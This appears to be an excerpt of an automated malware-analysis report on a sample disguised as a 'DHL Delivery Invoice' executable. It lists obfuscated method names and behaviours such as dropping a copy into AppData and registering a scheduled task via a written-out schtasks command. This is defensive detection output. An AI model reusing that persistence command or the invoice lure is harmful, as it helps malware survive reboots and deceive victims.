                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, hRi78eY2vqba3sjOFgE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'I9ECeMD3Be', 'V7uCmdZEVp', 'DUACJqGCPo', 'zGBCaJLRaI', 'e2UCweY0vY', 'B5mCRL99YO', 'basCiefJ48'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, eV2UW4jMaGcT6OE5sg.csHigh entropy of concatenated method names: 'SGunLTe1Ci', 'j7qnOu7cyQ', 'SIw72kttqG', 'aMw7YWFGKM', 'OPxneH03Rd', 'tRfnmu29hG', 'oG3nJ43Uu3', 'ffvnay4Otc', 'U01nwdlkB7', 'vlcnReSL8C'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, AhqLRAzDifvQitaSMY.csHigh entropy of concatenated method names: 'DCFCDWkHne', 'aXuCtm2uA0', 'syxCAUKMAw', 'nkHCl5SYBX', 'J5QCQIT6kv', 'kniCVfuZ7R', 'BgkCvf2jmp', 'C8NCH66Sd0', 'mpWC5t7OQe', 'uKEC4rx5Q4'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, KY302Gupdo3G84DdV4.csHigh entropy of concatenated method names: 'bXdY8W3n9D', 'sUKYUVoFXJ', 'ssLY6YVfId', 'jX6YddeoOi', 'bk2YGaJABo', 'YdSY9DPIU1', 'NILI6LxygqnmD3FF7L', 'Ywwe2RJBb2JYGBoSb6', 'eTBYYye0Wr', 'O7eYhisBv7'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, nW3n9DtCUKVoFXJXYL.csHigh entropy of concatenated method names: 'ItS0a5Vmaf', 'NM30wMKDOW', 'A3D0RdZ0pm', 'uxH0iEAGsA', 'UOZ014kgnD', 'rci0j7Cmp3', 'IPa0IoI4jD', 'jFl0LRRsru', 'sR90qOhksn', 'Pj80OInC4h'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, r10FOIq3RwJJSDBE6T.csHigh entropy of concatenated method names: 'HDpyloxufv', 'UXbyQr7Exk', 'uV9yKNI40X', 'ONcyVAUINA', 'DLoyv6KpFC', 'F6Gyk4HyUT', 'C7OycQvjwd', 'nNKyT9JaaA', 'JY0yfaoaSS', 'qQOyF5ZlyA'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, ak9TLTYYo3XPXTuLLCn.csHigh entropy of concatenated method names: 'xNYCOKTpuf', 'zvTCz9VAKk', 'TQMr2AXJ8U', 'CV9rYJ2GvD', 'afqrNn5Qxd', 'tI8rhCSCmE', 'pl5ruDHxHN', 'uB7roHWyaD', 'Jo6rWOwvyI', 'GNBr0HYXa1'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, zYIKPrYuoh0gmw1dmks.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tRLgyXWa0d', 'lGfgCRuOBk', 'lxwgrgl0Cw', 'XJvggt3EmU', 'sH8gSFkv16', 'kxVgs4W9Be', 'hcjgHVdmaL'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, aQHQCCAsLYVfId8X6d.csHigh entropy of concatenated method names: 'svN3pGU1xV', 'GZH3Dwkw0K', 'Yi73tbOLXZ', 'MMe3AyhHyN', 'a383GIXmrL', 'afr39fbhNy', 'jJb3nU6p31', 'wrs37kjo6t', 'd7H3yCIgCQ', 'k943CsXx3f'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, raUZwtankETy9DHvxq.csHigh entropy of concatenated method names: 'XhrGFsC4wL', 'vBAGmH8YWu', 'Qw6Ga2sDav', 'FA6GwG9cYM', 'GpXGQ1PsPR', 'BMRGKj6HGB', 'qypGVSmjYs', 'U58GvNaKnO', 'P2pGkpsslL', 'NvrGcR2npg'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, blCDnlN5aw2LgftDY2.csHigh entropy of concatenated method names: 'sjJbBFGs7', 'rj4pypSxr', 'rZeDQ77cn', 'rAMB9sUrE', 'A30ARZ4u7', 'UYEXSrS17', 'uXkQ7dI4E8cViZ1ScI', 'ihfvoSTDHhvJljB0Kq', 'J9n7EOqgG', 'd7YC6W9DO'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, OoOiy3XUylJnXYk2aJ.csHigh entropy of concatenated method names: 'JrpxEY5y53', 'WThxBSXAvl', 'PyG3KdQNVv', 'XEg3VvcDXO', 'Ytc3vGQcCN', 'BmD3kkobU2', 'jdk3c2xSEf', 'u3F3T0CwYf', 'Ltw3flFFZk', 'Duc3Fl4i46'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, T4MYihU2jTbHZyP9hj.csHigh entropy of concatenated method names: 'AAjhoMgorH', 'bI0hWpRlfO', 'ST2h0PYG1L', 'MNih32ZIyu', 'oVwhxlxglw', 'sI4hZkDFpv', 'QfKh8RD9Tu', 'U4XhU2OIHX', 'a0rhPJJaTk', 'RmJh6eVvq4'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, Dd2Bi7JvwPWUxrQeTw.csHigh entropy of concatenated method names: 'm6SMtHkp2K', 'AejMA47DFm', 'ubxMl6icFV', 'ywiMQWmdeN', 'pJRMVg7xjp', 'hRWMvvM1Pr', 'D9XMc9G80J', 'HHCMTpQAHR', 'fYoMFmhp5e', 'coJMeBhc3Q'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, bKGaGCfN9r8b3dAxfR.csHigh entropy of concatenated method names: 'BWh85jVV9w', 'l4t8402TsD', 'U3i8b96aHo', 'eyS8pGBfjH', 'qyM8EUjIQZ', 'GLT8DjxZdi', 'sMH8BOZdEm', 'NkJ8t0HKt1', 'je68AZNDDD', 'iH48XqcaoE'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, psJmfbcnh2UHCfO6X1.csHigh entropy of concatenated method names: 'doi8WEr9EH', 'WiC83D7CGt', 'xLP8Z4u0V8', 'dQZZOU2Bxt', 'THjZzlHolR', 'Hak821U2DW', 'lP28Yeyepr', 'NNy8NwM91q', 'G4r8haSOiV', 'dxr8uWgWUo'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, nlClL9RBjENyMP58Sf.csHigh entropy of concatenated method names: 'ToString', 'euG9e2dejU', 'Utj9QoUb4N', 'LXg9KAVG8L', 'O3D9Va80Ak', 'OtM9vFJWRr', 'Sbq9kP6okc', 'gkX9c4qXrP', 'MP29TAq7Cp', 'SuS9fIIIVn'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, YfCfd4O8KR8Cn3tWPs.csHigh entropy of concatenated method names: 'x34C31kRmi', 'KfeCxU9JBD', 'yObCZKn68F', 'fKsC8DdcLP', 'eWXCyk7Ysm', 'AsdCUju54q', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, MKu06VYhTUgWX8T7pex.csHigh entropy of concatenated method names: 'IgHrOG1xwL', 'TJZrz8Uc9u', 'Xftg2BptFh', 'AxRuDZHPEhewdED7evS', 'nLXmqPHdwlEaly45t7y', 'u159PWHH02DLxmNGMEn', 'vdW1SgHK0WCWLquc8iu'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, EBoOdSlDPIU1RApnZW.csHigh entropy of concatenated method names: 'mtkZovqfLX', 'wCEZ00W1Y8', 'b4dZxQIqrY', 'OBIZ85XOT0', 't8pZUMqrA3', 'EsMx1Tm4XQ', 'MSAxjBM9Ha', 'E1sxIgGVdR', 'MEVxLaQr0Q', 'CvRxq6FcG2'
                      Source: 0.2.DHL Delivery Invoice.exe.45f9b08.3.raw.unpack, W3NEvE0F9vk3mc0EGh.csHigh entropy of concatenated method names: 'Dispose', 'wI4YqGaRjO', 'DN4NQALee0', 'DwOCGjEhbn', 'FaXYOlPf4U', 'NT8YzIB8jv', 'ProcessDialogKey', 'GU7N210FOI', 'hRwNYJJSDB', 'B6TNNOfCfd'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, s3M8YEIWMsI4GaRjOl.csHigh entropy of concatenated method names: 'bugyGBoTgU', 'WGqynxvpqV', 'Y65yykZFHl', 'Bw1yrK8Sda', 'wQdyS3WG8L', 'yUfyHmPour', 'Dispose', 'xm97W2QMaX', 'MQI70HKbc0', 'ftQ73CAtHG'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, hRi78eY2vqba3sjOFgE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'I9ECeMD3Be', 'V7uCmdZEVp', 'DUACJqGCPo', 'zGBCaJLRaI', 'e2UCweY0vY', 'B5mCRL99YO', 'basCiefJ48'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, eV2UW4jMaGcT6OE5sg.csHigh entropy of concatenated method names: 'SGunLTe1Ci', 'j7qnOu7cyQ', 'SIw72kttqG', 'aMw7YWFGKM', 'OPxneH03Rd', 'tRfnmu29hG', 'oG3nJ43Uu3', 'ffvnay4Otc', 'U01nwdlkB7', 'vlcnReSL8C'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, AhqLRAzDifvQitaSMY.csHigh entropy of concatenated method names: 'DCFCDWkHne', 'aXuCtm2uA0', 'syxCAUKMAw', 'nkHCl5SYBX', 'J5QCQIT6kv', 'kniCVfuZ7R', 'BgkCvf2jmp', 'C8NCH66Sd0', 'mpWC5t7OQe', 'uKEC4rx5Q4'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, KY302Gupdo3G84DdV4.csHigh entropy of concatenated method names: 'bXdY8W3n9D', 'sUKYUVoFXJ', 'ssLY6YVfId', 'jX6YddeoOi', 'bk2YGaJABo', 'YdSY9DPIU1', 'NILI6LxygqnmD3FF7L', 'Ywwe2RJBb2JYGBoSb6', 'eTBYYye0Wr', 'O7eYhisBv7'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, nW3n9DtCUKVoFXJXYL.csHigh entropy of concatenated method names: 'ItS0a5Vmaf', 'NM30wMKDOW', 'A3D0RdZ0pm', 'uxH0iEAGsA', 'UOZ014kgnD', 'rci0j7Cmp3', 'IPa0IoI4jD', 'jFl0LRRsru', 'sR90qOhksn', 'Pj80OInC4h'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, r10FOIq3RwJJSDBE6T.csHigh entropy of concatenated method names: 'HDpyloxufv', 'UXbyQr7Exk', 'uV9yKNI40X', 'ONcyVAUINA', 'DLoyv6KpFC', 'F6Gyk4HyUT', 'C7OycQvjwd', 'nNKyT9JaaA', 'JY0yfaoaSS', 'qQOyF5ZlyA'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, ak9TLTYYo3XPXTuLLCn.csHigh entropy of concatenated method names: 'xNYCOKTpuf', 'zvTCz9VAKk', 'TQMr2AXJ8U', 'CV9rYJ2GvD', 'afqrNn5Qxd', 'tI8rhCSCmE', 'pl5ruDHxHN', 'uB7roHWyaD', 'Jo6rWOwvyI', 'GNBr0HYXa1'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, zYIKPrYuoh0gmw1dmks.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tRLgyXWa0d', 'lGfgCRuOBk', 'lxwgrgl0Cw', 'XJvggt3EmU', 'sH8gSFkv16', 'kxVgs4W9Be', 'hcjgHVdmaL'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, aQHQCCAsLYVfId8X6d.csHigh entropy of concatenated method names: 'svN3pGU1xV', 'GZH3Dwkw0K', 'Yi73tbOLXZ', 'MMe3AyhHyN', 'a383GIXmrL', 'afr39fbhNy', 'jJb3nU6p31', 'wrs37kjo6t', 'd7H3yCIgCQ', 'k943CsXx3f'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, raUZwtankETy9DHvxq.csHigh entropy of concatenated method names: 'XhrGFsC4wL', 'vBAGmH8YWu', 'Qw6Ga2sDav', 'FA6GwG9cYM', 'GpXGQ1PsPR', 'BMRGKj6HGB', 'qypGVSmjYs', 'U58GvNaKnO', 'P2pGkpsslL', 'NvrGcR2npg'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, blCDnlN5aw2LgftDY2.csHigh entropy of concatenated method names: 'sjJbBFGs7', 'rj4pypSxr', 'rZeDQ77cn', 'rAMB9sUrE', 'A30ARZ4u7', 'UYEXSrS17', 'uXkQ7dI4E8cViZ1ScI', 'ihfvoSTDHhvJljB0Kq', 'J9n7EOqgG', 'd7YC6W9DO'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, OoOiy3XUylJnXYk2aJ.csHigh entropy of concatenated method names: 'JrpxEY5y53', 'WThxBSXAvl', 'PyG3KdQNVv', 'XEg3VvcDXO', 'Ytc3vGQcCN', 'BmD3kkobU2', 'jdk3c2xSEf', 'u3F3T0CwYf', 'Ltw3flFFZk', 'Duc3Fl4i46'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, T4MYihU2jTbHZyP9hj.csHigh entropy of concatenated method names: 'AAjhoMgorH', 'bI0hWpRlfO', 'ST2h0PYG1L', 'MNih32ZIyu', 'oVwhxlxglw', 'sI4hZkDFpv', 'QfKh8RD9Tu', 'U4XhU2OIHX', 'a0rhPJJaTk', 'RmJh6eVvq4'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, Dd2Bi7JvwPWUxrQeTw.csHigh entropy of concatenated method names: 'm6SMtHkp2K', 'AejMA47DFm', 'ubxMl6icFV', 'ywiMQWmdeN', 'pJRMVg7xjp', 'hRWMvvM1Pr', 'D9XMc9G80J', 'HHCMTpQAHR', 'fYoMFmhp5e', 'coJMeBhc3Q'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, bKGaGCfN9r8b3dAxfR.csHigh entropy of concatenated method names: 'BWh85jVV9w', 'l4t8402TsD', 'U3i8b96aHo', 'eyS8pGBfjH', 'qyM8EUjIQZ', 'GLT8DjxZdi', 'sMH8BOZdEm', 'NkJ8t0HKt1', 'je68AZNDDD', 'iH48XqcaoE'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, psJmfbcnh2UHCfO6X1.csHigh entropy of concatenated method names: 'doi8WEr9EH', 'WiC83D7CGt', 'xLP8Z4u0V8', 'dQZZOU2Bxt', 'THjZzlHolR', 'Hak821U2DW', 'lP28Yeyepr', 'NNy8NwM91q', 'G4r8haSOiV', 'dxr8uWgWUo'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, nlClL9RBjENyMP58Sf.csHigh entropy of concatenated method names: 'ToString', 'euG9e2dejU', 'Utj9QoUb4N', 'LXg9KAVG8L', 'O3D9Va80Ak', 'OtM9vFJWRr', 'Sbq9kP6okc', 'gkX9c4qXrP', 'MP29TAq7Cp', 'SuS9fIIIVn'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, YfCfd4O8KR8Cn3tWPs.csHigh entropy of concatenated method names: 'x34C31kRmi', 'KfeCxU9JBD', 'yObCZKn68F', 'fKsC8DdcLP', 'eWXCyk7Ysm', 'AsdCUju54q', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, MKu06VYhTUgWX8T7pex.csHigh entropy of concatenated method names: 'IgHrOG1xwL', 'TJZrz8Uc9u', 'Xftg2BptFh', 'AxRuDZHPEhewdED7evS', 'nLXmqPHdwlEaly45t7y', 'u159PWHH02DLxmNGMEn', 'vdW1SgHK0WCWLquc8iu'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, EBoOdSlDPIU1RApnZW.csHigh entropy of concatenated method names: 'mtkZovqfLX', 'wCEZ00W1Y8', 'b4dZxQIqrY', 'OBIZ85XOT0', 't8pZUMqrA3', 'EsMx1Tm4XQ', 'MSAxjBM9Ha', 'E1sxIgGVdR', 'MEVxLaQr0Q', 'CvRxq6FcG2'
                      Source: 0.2.DHL Delivery Invoice.exe.457ace8.1.raw.unpack, W3NEvE0F9vk3mc0EGh.csHigh entropy of concatenated method names: 'Dispose', 'wI4YqGaRjO', 'DN4NQALee0', 'DwOCGjEhbn', 'FaXYOlPf4U', 'NT8YzIB8jv', 'ProcessDialogKey', 'GU7N210FOI', 'hRwNYJJSDB', 'B6TNNOfCfd'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, s3M8YEIWMsI4GaRjOl.csHigh entropy of concatenated method names: 'bugyGBoTgU', 'WGqynxvpqV', 'Y65yykZFHl', 'Bw1yrK8Sda', 'wQdyS3WG8L', 'yUfyHmPour', 'Dispose', 'xm97W2QMaX', 'MQI70HKbc0', 'ftQ73CAtHG'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, hRi78eY2vqba3sjOFgE.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'I9ECeMD3Be', 'V7uCmdZEVp', 'DUACJqGCPo', 'zGBCaJLRaI', 'e2UCweY0vY', 'B5mCRL99YO', 'basCiefJ48'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, eV2UW4jMaGcT6OE5sg.csHigh entropy of concatenated method names: 'SGunLTe1Ci', 'j7qnOu7cyQ', 'SIw72kttqG', 'aMw7YWFGKM', 'OPxneH03Rd', 'tRfnmu29hG', 'oG3nJ43Uu3', 'ffvnay4Otc', 'U01nwdlkB7', 'vlcnReSL8C'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, AhqLRAzDifvQitaSMY.csHigh entropy of concatenated method names: 'DCFCDWkHne', 'aXuCtm2uA0', 'syxCAUKMAw', 'nkHCl5SYBX', 'J5QCQIT6kv', 'kniCVfuZ7R', 'BgkCvf2jmp', 'C8NCH66Sd0', 'mpWC5t7OQe', 'uKEC4rx5Q4'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, KY302Gupdo3G84DdV4.csHigh entropy of concatenated method names: 'bXdY8W3n9D', 'sUKYUVoFXJ', 'ssLY6YVfId', 'jX6YddeoOi', 'bk2YGaJABo', 'YdSY9DPIU1', 'NILI6LxygqnmD3FF7L', 'Ywwe2RJBb2JYGBoSb6', 'eTBYYye0Wr', 'O7eYhisBv7'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, nW3n9DtCUKVoFXJXYL.csHigh entropy of concatenated method names: 'ItS0a5Vmaf', 'NM30wMKDOW', 'A3D0RdZ0pm', 'uxH0iEAGsA', 'UOZ014kgnD', 'rci0j7Cmp3', 'IPa0IoI4jD', 'jFl0LRRsru', 'sR90qOhksn', 'Pj80OInC4h'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, r10FOIq3RwJJSDBE6T.csHigh entropy of concatenated method names: 'HDpyloxufv', 'UXbyQr7Exk', 'uV9yKNI40X', 'ONcyVAUINA', 'DLoyv6KpFC', 'F6Gyk4HyUT', 'C7OycQvjwd', 'nNKyT9JaaA', 'JY0yfaoaSS', 'qQOyF5ZlyA'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, ak9TLTYYo3XPXTuLLCn.csHigh entropy of concatenated method names: 'xNYCOKTpuf', 'zvTCz9VAKk', 'TQMr2AXJ8U', 'CV9rYJ2GvD', 'afqrNn5Qxd', 'tI8rhCSCmE', 'pl5ruDHxHN', 'uB7roHWyaD', 'Jo6rWOwvyI', 'GNBr0HYXa1'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, zYIKPrYuoh0gmw1dmks.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'tRLgyXWa0d', 'lGfgCRuOBk', 'lxwgrgl0Cw', 'XJvggt3EmU', 'sH8gSFkv16', 'kxVgs4W9Be', 'hcjgHVdmaL'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, aQHQCCAsLYVfId8X6d.csHigh entropy of concatenated method names: 'svN3pGU1xV', 'GZH3Dwkw0K', 'Yi73tbOLXZ', 'MMe3AyhHyN', 'a383GIXmrL', 'afr39fbhNy', 'jJb3nU6p31', 'wrs37kjo6t', 'd7H3yCIgCQ', 'k943CsXx3f'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, raUZwtankETy9DHvxq.csHigh entropy of concatenated method names: 'XhrGFsC4wL', 'vBAGmH8YWu', 'Qw6Ga2sDav', 'FA6GwG9cYM', 'GpXGQ1PsPR', 'BMRGKj6HGB', 'qypGVSmjYs', 'U58GvNaKnO', 'P2pGkpsslL', 'NvrGcR2npg'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, blCDnlN5aw2LgftDY2.csHigh entropy of concatenated method names: 'sjJbBFGs7', 'rj4pypSxr', 'rZeDQ77cn', 'rAMB9sUrE', 'A30ARZ4u7', 'UYEXSrS17', 'uXkQ7dI4E8cViZ1ScI', 'ihfvoSTDHhvJljB0Kq', 'J9n7EOqgG', 'd7YC6W9DO'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, OoOiy3XUylJnXYk2aJ.csHigh entropy of concatenated method names: 'JrpxEY5y53', 'WThxBSXAvl', 'PyG3KdQNVv', 'XEg3VvcDXO', 'Ytc3vGQcCN', 'BmD3kkobU2', 'jdk3c2xSEf', 'u3F3T0CwYf', 'Ltw3flFFZk', 'Duc3Fl4i46'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, T4MYihU2jTbHZyP9hj.csHigh entropy of concatenated method names: 'AAjhoMgorH', 'bI0hWpRlfO', 'ST2h0PYG1L', 'MNih32ZIyu', 'oVwhxlxglw', 'sI4hZkDFpv', 'QfKh8RD9Tu', 'U4XhU2OIHX', 'a0rhPJJaTk', 'RmJh6eVvq4'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, Dd2Bi7JvwPWUxrQeTw.csHigh entropy of concatenated method names: 'm6SMtHkp2K', 'AejMA47DFm', 'ubxMl6icFV', 'ywiMQWmdeN', 'pJRMVg7xjp', 'hRWMvvM1Pr', 'D9XMc9G80J', 'HHCMTpQAHR', 'fYoMFmhp5e', 'coJMeBhc3Q'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, bKGaGCfN9r8b3dAxfR.csHigh entropy of concatenated method names: 'BWh85jVV9w', 'l4t8402TsD', 'U3i8b96aHo', 'eyS8pGBfjH', 'qyM8EUjIQZ', 'GLT8DjxZdi', 'sMH8BOZdEm', 'NkJ8t0HKt1', 'je68AZNDDD', 'iH48XqcaoE'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, psJmfbcnh2UHCfO6X1.csHigh entropy of concatenated method names: 'doi8WEr9EH', 'WiC83D7CGt', 'xLP8Z4u0V8', 'dQZZOU2Bxt', 'THjZzlHolR', 'Hak821U2DW', 'lP28Yeyepr', 'NNy8NwM91q', 'G4r8haSOiV', 'dxr8uWgWUo'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, nlClL9RBjENyMP58Sf.csHigh entropy of concatenated method names: 'ToString', 'euG9e2dejU', 'Utj9QoUb4N', 'LXg9KAVG8L', 'O3D9Va80Ak', 'OtM9vFJWRr', 'Sbq9kP6okc', 'gkX9c4qXrP', 'MP29TAq7Cp', 'SuS9fIIIVn'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, YfCfd4O8KR8Cn3tWPs.csHigh entropy of concatenated method names: 'x34C31kRmi', 'KfeCxU9JBD', 'yObCZKn68F', 'fKsC8DdcLP', 'eWXCyk7Ysm', 'AsdCUju54q', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, MKu06VYhTUgWX8T7pex.csHigh entropy of concatenated method names: 'IgHrOG1xwL', 'TJZrz8Uc9u', 'Xftg2BptFh', 'AxRuDZHPEhewdED7evS', 'nLXmqPHdwlEaly45t7y', 'u159PWHH02DLxmNGMEn', 'vdW1SgHK0WCWLquc8iu'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, EBoOdSlDPIU1RApnZW.csHigh entropy of concatenated method names: 'mtkZovqfLX', 'wCEZ00W1Y8', 'b4dZxQIqrY', 'OBIZ85XOT0', 't8pZUMqrA3', 'EsMx1Tm4XQ', 'MSAxjBM9Ha', 'E1sxIgGVdR', 'MEVxLaQr0Q', 'CvRxq6FcG2'
                      Source: 0.2.DHL Delivery Invoice.exe.9d70000.6.raw.unpack, W3NEvE0F9vk3mc0EGh.csHigh entropy of concatenated method names: 'Dispose', 'wI4YqGaRjO', 'DN4NQALee0', 'DwOCGjEhbn', 'FaXYOlPf4U', 'NT8YzIB8jv', 'ProcessDialogKey', 'GU7N210FOI', 'hRwNYJJSDB', 'B6TNNOfCfd'
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeFile created: C:\Users\user\AppData\Roaming\LIWBHGsz.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LIWBHGsz" /XML "C:\Users\user\AppData\Local\Temp\tmpC314.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
